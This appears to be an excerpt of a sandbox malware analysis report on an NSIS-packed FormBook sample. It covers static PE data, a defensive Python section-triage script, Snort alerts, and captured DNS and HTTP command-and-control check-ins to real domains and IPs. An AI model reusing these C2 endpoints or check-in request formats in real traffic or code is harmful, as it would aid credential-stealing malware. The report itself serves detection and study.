                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:b1a57b635b23ffd553b3fd1e0960b2bd

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                sub esp, 00000184h
                                                                                                push ebx
                                                                                                push ebp
                                                                                                push esi
                                                                                                push edi
                                                                                                xor ebx, ebx
                                                                                                push 00008001h
                                                                                                mov dword ptr [esp+20h], ebx
                                                                                                mov dword ptr [esp+14h], 00409130h
                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                mov byte ptr [esp+18h], 00000020h
                                                                                                call dword ptr [004070B4h]
                                                                                                call dword ptr [004070B0h]
                                                                                                cmp ax, 00000006h
                                                                                                je 00007FA3A8D35D53h
                                                                                                push ebx
                                                                                                call 00007FA3A8D38B4Ch
                                                                                                cmp eax, ebx
                                                                                                je 00007FA3A8D35D49h
                                                                                                push 00000C00h
                                                                                                call eax
                                                                                                mov esi, 00407280h
                                                                                                push esi
                                                                                                call 00007FA3A8D38AC8h
                                                                                                push esi
                                                                                                call dword ptr [004070ACh]
                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                cmp byte ptr [esi], bl
                                                                                                jne 00007FA3A8D35D2Dh
                                                                                                push 0000000Dh
                                                                                                call 00007FA3A8D38B20h
                                                                                                push 0000000Bh
                                                                                                call 00007FA3A8D38B19h
                                                                                                mov dword ptr [007A27A4h], eax
                                                                                                call dword ptr [00407038h]
                                                                                                push ebx
                                                                                                call dword ptr [0040726Ch]
                                                                                                mov dword ptr [007A2858h], eax
                                                                                                push ebx
                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                push 00000160h
                                                                                                push eax
                                                                                                push ebx
                                                                                                push 0079DD58h
                                                                                                call dword ptr [0040715Ch]
                                                                                                push 004091C0h
                                                                                                push 007A1FA0h
                                                                                                call 00007FA3A8D3874Ch
                                                                                                call dword ptr [00407108h]
                                                                                                mov ebp, 007A8000h
                                                                                                push eax
                                                                                                push ebp
                                                                                                call 00007FA3A8D3873Ah
                                                                                                push ebx
                                                                                                call dword ptr [00407144h]

                                                                                                Rich Headers

                                                                                                Programming Language:
                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7418           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3ab000         0x967         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x27c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x5dbf        0x5e00    False     0.682222406915   data       6.52625021941  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x7000           0x1196        0x1200    False     0.458767361111   data       5.20373620342  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x9000           0x399898      0x600     unknown   unknown          unknown    unknown        IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x3a3000         0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x3ab000         0x967         0xa00     False     0.425390625      data       4.34609765996  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
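The following is an added example, not part of the Joe Sandbox report, that turns the section table above into the two checks an analyst runs on an NSIS-packed sample: flag sections whose virtual size dwarfs their raw size (the loader maps them as zeros and the stub fills them at runtime), and estimate the overlay after the last section, which for an NSIS installer is the compressed archive that the stub extracts to %TEMP%. Section values and the file size are copied from the report; the 0x400 raw offset of the first section and the 0x1000 section alignment are assumptions, since the report lists neither.

```python
# Added example (not part of the Joe Sandbox report): triage of the section
# table of an NSIS-packed sample. Section values are copied from the
# report's Sections table; FILE_SIZE is from Static File Info. The raw
# offset of the first section (0x400) and the section alignment (0x1000)
# are assumptions, the report lists neither.
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: Optional[float]  # None where the report says "unknown"


SECTIONS = [
    Section(".text",  0x1000,   0x5dbf,   0x5e00, 6.52625021941),
    Section(".rdata", 0x7000,   0x1196,   0x1200, 5.20373620342),
    Section(".data",  0x9000,   0x399898, 0x600,  None),
    Section(".ndata", 0x3a3000, 0x8000,   0x0,    0.0),
    Section(".rsrc",  0x3ab000, 0x967,    0xa00,  4.34609765996),
]
FILE_SIZE = 211985           # "File size" in Static File Info
FIRST_RAW_OFFSET = 0x400     # assumption: PE headers padded to 0x400 on disk
SECTION_ALIGNMENT = 0x1000   # assumption: default SectionAlignment


def suspicious_sections(sections: List[Section], ratio: float = 8.0,
                        high_entropy: float = 7.0) -> List[Tuple[str, str]]:
    """Flag sections that are filled at runtime or carry packed data.

    VirtualSize >> RawSize: the loader maps a large zero-filled region that
    the stub populates after unpacking. Entropy > 7: compressed/encrypted bytes.
    """
    flagged = []
    for s in sections:
        if s.raw_size == 0 or s.virtual_size / s.raw_size > ratio:
            flagged.append((s.name, "virtual size >> raw size"))
        elif s.entropy is not None and s.entropy > high_entropy:
            flagged.append((s.name, "high entropy"))
    return flagged


def overlay_size(sections: List[Section], file_size: int,
                 first_raw_offset: int = FIRST_RAW_OFFSET) -> int:
    """Bytes on disk after the last section. For NSIS this is the compressed
    installer archive that the stub extracts into %TEMP% at runtime."""
    end_of_sections = first_raw_offset + sum(s.raw_size for s in sections)
    return max(0, file_size - end_of_sections)


def check_layout(sections: List[Section],
                 alignment: int = SECTION_ALIGNMENT) -> List[str]:
    """Each section should start where the previous one ends, rounded up to
    the section alignment; anything else hints at a hand-edited header."""
    problems = []
    for prev, cur in zip(sections, sections[1:]):
        expected = (prev.virtual_address + prev.virtual_size + alignment - 1) & ~(alignment - 1)
        if cur.virtual_address != expected:
            problems.append(f"{cur.name} at {cur.virtual_address:#x}, expected {expected:#x}")
    return problems


if __name__ == "__main__":
    for name, why in suspicious_sections(SECTIONS):
        print(f"{name}: {why}")                                  # .data, .ndata
    print(f"overlay: {overlay_size(SECTIONS, FILE_SIZE)} bytes")  # 178193
    print("layout problems:", check_layout(SECTIONS) or "none")
```

With these inputs the script flags .data and .ndata, finds the section layout consistent, and puts the overlay at 178193 bytes, close to the 177152-byte lckp0.dll that the installer drops at runtime. The time stamp, Rich header and entrypoint code listed under Static PE Info describe the prebuilt NSIS stub, not the FormBook payload; the payload lives in that overlay.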

                                                                                                Resources

Name         RVA       Size   Type                                                                          Language  Country
RT_DIALOG    0x3ab178  0xb8   data                                                                          English   United States
RT_DIALOG    0x3ab230  0x100  data                                                                          English   United States
RT_DIALOG    0x3ab330  0x11c  data                                                                          English   United States
RT_DIALOG    0x3ab44c  0x60   data                                                                          English   United States
RT_VERSION   0x3ab4ac  0x108  PDP-11 pure executable not stripped                                           English   United States
RT_MANIFEST  0x3ab5b4  0x3b3  XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

Note: the "PDP-11 pure executable" type on RT_VERSION is a libmagic misidentification, not a real finding. A VS_VERSIONINFO block begins with its own length as a 16-bit word, here 0x0108 (the resource is 0x108 bytes), and 0x0108 (octal 0410) is also the PDP-11 a.out magic that file(1) matches first.

                                                                                                Imports

DLL           Import
KERNEL32.dll  GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, Sleep, lstrcmpiA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetCommandLineA, GetTempPathA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll    SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll     SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll   SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll  RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll  ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll     OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                Version Infos

Description  Data
ProductName  album
Translation  0x0409 0x0000

                                                                                                Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/22/21-08:56:02.968680 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49721 | 80 | 192.168.2.5 | 172.106.71.28
03/22/21-08:56:02.968680 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49721 | 80 | 192.168.2.5 | 172.106.71.28
03/22/21-08:56:02.968680 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49721 | 80 | 192.168.2.5 | 172.106.71.28
03/22/21-08:56:25.619002 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.5 | 103.48.133.159
03/22/21-08:56:25.619002 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.5 | 103.48.133.159
03/22/21-08:56:25.619002 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.5 | 103.48.133.159
03/22/21-08:56:42.087268 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.5 | 192.0.78.25
03/22/21-08:56:42.087268 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.5 | 192.0.78.25
03/22/21-08:56:42.087268 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.5 | 192.0.78.25

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 22, 2021 08:55:36.249867916 CET | 192.168.2.5 | 8.8.8.8 | 0x232 | Standard query (0) | www.best10hostings.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:55:41.344412088 CET | 192.168.2.5 | 8.8.8.8 | 0xdb7f | Standard query (0) | www.verratjewelry.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:55:46.440406084 CET | 192.168.2.5 | 8.8.8.8 | 0x64bc | Standard query (0) | www.maggionaossurvey.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:55:51.655822039 CET | 192.168.2.5 | 8.8.8.8 | 0x83c2 | Standard query (0) | www.fabulousfalafel.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:55:56.751733065 CET | 192.168.2.5 | 8.8.8.8 | 0x8c22 | Standard query (0) | www.fenixforex.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:02.630248070 CET | 192.168.2.5 | 8.8.8.8 | 0xec5a | Standard query (0) | www.somht.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:08.710719109 CET | 192.168.2.5 | 8.8.8.8 | 0x878d | Standard query (0) | www.capacitaciondelfuturo.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:14.097253084 CET | 192.168.2.5 | 8.8.8.8 | 0x55c2 | Standard query (0) | www.mantequillahub.pro | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:19.302058935 CET | 192.168.2.5 | 8.8.8.8 | 0x2efd | Standard query (0) | www.casinoflames.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:24.974946976 CET | 192.168.2.5 | 8.8.8.8 | 0x9ad1 | Standard query (0) | www.yyxingfa.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:36.879928112 CET | 192.168.2.5 | 8.8.8.8 | 0x89a1 | Standard query (0) | www.xcash.fund | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:41.986288071 CET | 192.168.2.5 | 8.8.8.8 | 0xac8e | Standard query (0) | www.michaelroberts.gallery | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:47.147586107 CET | 192.168.2.5 | 8.8.8.8 | 0x94a4 | Standard query (0) | www.antiracismbyu.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:53.019181013 CET | 192.168.2.5 | 8.8.8.8 | 0x40cd | Standard query (0) | www.rahasiasuksesbo.com | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:58.492563963 CET | 192.168.2.5 | 8.8.8.8 | 0x37e5 | Standard query (0) | www.cvhrcm.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 22, 2021 08:55:36.322457075 CET | 8.8.8.8 | 192.168.2.5 | 0x232 | Name error (3) | www.best10hostings.com | none | none | A (IP address) | IN (0x0001)
Mar 22, 2021 08:55:41.422111034 CET | 8.8.8.8 | 192.168.2.5 | 0xdb7f | Name error (3) | www.verratjewelry.com | none | none | A (IP address) | IN (0x0001)
Mar 22, 2021 08:55:46.495354891 CET | 8.8.8.8 | 192.168.2.5 | 0x64bc | No error (0) | www.maggionaossurvey.com | | 81.17.18.197 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:55:56.942375898 CET | 8.8.8.8 | 192.168.2.5 | 0x8c22 | No error (0) | www.fenixforex.com | yjmanks.sitelockcdn.net | | CNAME (Canonical name) | IN (0x0001)
Mar 22, 2021 08:55:56.942375898 CET | 8.8.8.8 | 192.168.2.5 | 0x8c22 | No error (0) | yjmanks.sitelockcdn.net | | 108.167.156.70 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:02.810904026 CET | 8.8.8.8 | 192.168.2.5 | 0xec5a | No error (0) | www.somht.com | | 172.106.71.28 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:08.771929026 CET | 8.8.8.8 | 192.168.2.5 | 0x878d | No error (0) | www.capacitaciondelfuturo.com | | 172.67.161.235 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:08.771929026 CET | 8.8.8.8 | 192.168.2.5 | 0x878d | No error (0) | www.capacitaciondelfuturo.com | | 104.21.15.71 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:14.188276052 CET | 8.8.8.8 | 192.168.2.5 | 0x55c2 | No error (0) | www.mantequillahub.pro | | 185.18.52.85 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:19.364322901 CET | 8.8.8.8 | 192.168.2.5 | 0x2efd | No error (0) | www.casinoflames.com | | 94.46.58.25 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:25.192636967 CET | 8.8.8.8 | 192.168.2.5 | 0x9ad1 | No error (0) | www.yyxingfa.com | | 103.48.133.159 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:36.942893028 CET | 8.8.8.8 | 192.168.2.5 | 0x89a1 | Name error (3) | www.xcash.fund | none | none | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:42.046802998 CET | 8.8.8.8 | 192.168.2.5 | 0xac8e | No error (0) | www.michaelroberts.gallery | michaelroberts.gallery | | CNAME (Canonical name) | IN (0x0001)
Mar 22, 2021 08:56:42.046802998 CET | 8.8.8.8 | 192.168.2.5 | 0xac8e | No error (0) | michaelroberts.gallery | | 192.0.78.25 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:42.046802998 CET | 8.8.8.8 | 192.168.2.5 | 0xac8e | No error (0) | michaelroberts.gallery | | 192.0.78.24 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:47.287919998 CET | 8.8.8.8 | 192.168.2.5 | 0x94a4 | No error (0) | www.antiracismbyu.com | antiracismbyu.com | | CNAME (Canonical name) | IN (0x0001)
Mar 22, 2021 08:56:47.287919998 CET | 8.8.8.8 | 192.168.2.5 | 0x94a4 | No error (0) | antiracismbyu.com | | 206.189.174.29 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:53.075745106 CET | 8.8.8.8 | 192.168.2.5 | 0x40cd | No error (0) | www.rahasiasuksesbo.com | rahasiasuksesbo.com | | CNAME (Canonical name) | IN (0x0001)
Mar 22, 2021 08:56:53.075745106 CET | 8.8.8.8 | 192.168.2.5 | 0x40cd | No error (0) | rahasiasuksesbo.com | | 180.235.151.22 | A (IP address) | IN (0x0001)
Mar 22, 2021 08:56:58.557575941 CET | 8.8.8.8 | 192.168.2.5 | 0x37e5 | Name error (3) | www.cvhrcm.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.maggionaossurvey.com
• www.fenixforex.com
• www.somht.com
• www.capacitaciondelfuturo.com
• www.mantequillahub.pro
• www.casinoflames.com
• www.yyxingfa.com
• www.michaelroberts.gallery
• www.antiracismbyu.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49717 | 81.17.18.197 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2021 08:55:46.552105904 CET | 1309 | OUT | GET /m2be/?t8r=Pmzzl7xNdTjxpE7TKPUfs2K+Zd8HAaj1ahYlw/e4QxTLjn1ka96YHmJ+nuPWA19CGBx9&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.maggionaossurvey.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
Mar 22, 2021 08:55:46.618179083 CET | 1310 | IN | HTTP/1.1 200 OK
                                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                                connection: close
                                                                                                content-length: 574
                                                                                                content-type: text/html; charset=utf-8
                                                                                                date: Mon, 22 Mar 2021 07:55:46 GMT
                                                                                                server: nginx
                                                                                                set-cookie: sid=029bed2c-8ae4-11eb-9acc-8cb85d74ab67; path=/; domain=.maggionaossurvey.com; expires=Sat, 09 Apr 2089 11:09:53 GMT; max-age=2147483647; HttpOnly
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 67 67 69 6f 6e 61 6f 73 73 75 72 76 65 79 2e 63 6f 6d 2f 6d 32 62 65 2f 3f 31 62 59 78 54 3d 6d 54 66 70 63 64 57 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4e 6a 51 77 4e 6a 6b 30 4e 69 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 32 4d 7a 6b 35 4e 7a 51 32 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 47 34 35 62 54 42 69 4e 7a 6b 34 63 33 56 30 63 32 63 30 62 47 73 77 62 47 6c 69 4e 44 49 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 59 7a 4f 54 6b 33 4e 44 59 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 32 4d 7a 6b 35 4e 7a 51 32 4e 6a 41 79 4e 7a 45 79 66 51 2e 71 36 66 58 5a 53 45 71 32 4f 49 35 36 6e 5a 58 64 39 61 63 63 68 6a 33 35 46 75 5f 71 54 46 76 53 76 46 37 62 76 71 6e 53 61 73 26 73 69 64 3d 30 32 39 62 65 64 32 63 2d 38 61 65 34 2d 31 31 65 62 2d 39 61 63 63 2d 38 63 62 38 35 64 37 34 61 62 36 37 26 74 38 72 3d 50 6d 7a 7a 6c 37 78 4e 64 54 6a 78 70 45 37 54 4b 50 55 66 73 32 4b 2b 5a 64 38 48 41 61 6a 31 61 68 59 6c 77 25 32 46 65 34 51 78 54 4c 6a 6e 31 6b 61 39 36 59 48 6d 4a 2b 6e 75 50 57 41 31 39 43 47 42 78 39 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.maggionaossurvey.com/m2be/?1bYxT=mTfpcdW&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxNjQwNjk0NiwiaWF0IjoxNjE2Mzk5NzQ2LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycG45bTBiNzk4c3V0c2c0bGswbGliNDIiLCJuYmYiOjE2MTYzOTk3NDYsInRzIjoxNjE2Mzk5NzQ2NjAyNzEyfQ.q6fXZSEq2OI56nZXd9acchj35Fu_qTFvSvF7bvqnSas&sid=029bed2c-8ae4-11eb-9acc-8cb85d74ab67&t8r=Pmzzl7xNdTjxpE7TKPUfs2K+Zd8HAaj1ahYlw%2Fe4QxTLjn1ka96YHmJ+nuPWA19CGBx9');</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49718 | 108.167.156.70 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2021 08:55:57.100789070 CET | 1311 | OUT | GET /m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.fenixforex.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
Mar 22, 2021 08:55:58.222946882 CET | 1312 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 22 Mar 2021 07:55:58 GMT
                                                                                                Server: nginx/1.19.5
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 0
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                X-Redirect-By: WordPress
                                                                                                Location: https://www.fenixforex.com/m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW
                                                                                                X-Server-Cache: true
                                                                                                X-Proxy-Cache: MISS
                                                                                                Set-Cookie: swpm_session=222a49f1071675c3e556858f46bc7736; path=/
                                                                                                X-Accel-Expires: 10800


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49721 | 172.106.71.28 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2021 08:56:02.968679905 CET | 1400 | OUT | GET /m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.somht.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
Mar 22, 2021 08:56:03.212107897 CET | 1400 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                Server: nginx
                                                                                                Date: Mon, 22 Mar 2021 08:04:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                X-Powered-By: PHP/7.3.20
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Location: http://somht.com/m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW
                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49722 | 172.67.161.235 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2021 08:56:08.818591118 CET | 1401 | OUT | GET /m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.capacitaciondelfuturo.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
Mar 22, 2021 08:56:09.084682941 CET | 1403 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 22 Mar 2021 07:56:09 GMT
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: __cfduid=dfca3bab8700e4192ddf0c8a90af368be1616399768; expires=Wed, 21-Apr-21 07:56:08 GMT; path=/; domain=.capacitaciondelfuturo.com; HttpOnly; SameSite=Lax
                                                                                                Location: https://www.capacitaciondelfuturo.com/m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 08fa8835160000fa702292b000000001
                                                                                                Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=G0BKUbR%2FlpMmt3IX5E1YQ04cFSqVo4vY1wLzjOuffsD90DXn4tNJjLIrQvCKMdhN6bt2itMnl8SE3OkKcrc8TRucFZpT7GSdCl3N25JLKMhApxPDiQDxStdA%2B9lr4g%3D%3D"}]}
                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 633ddc9b5ebffa70-AMS
                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
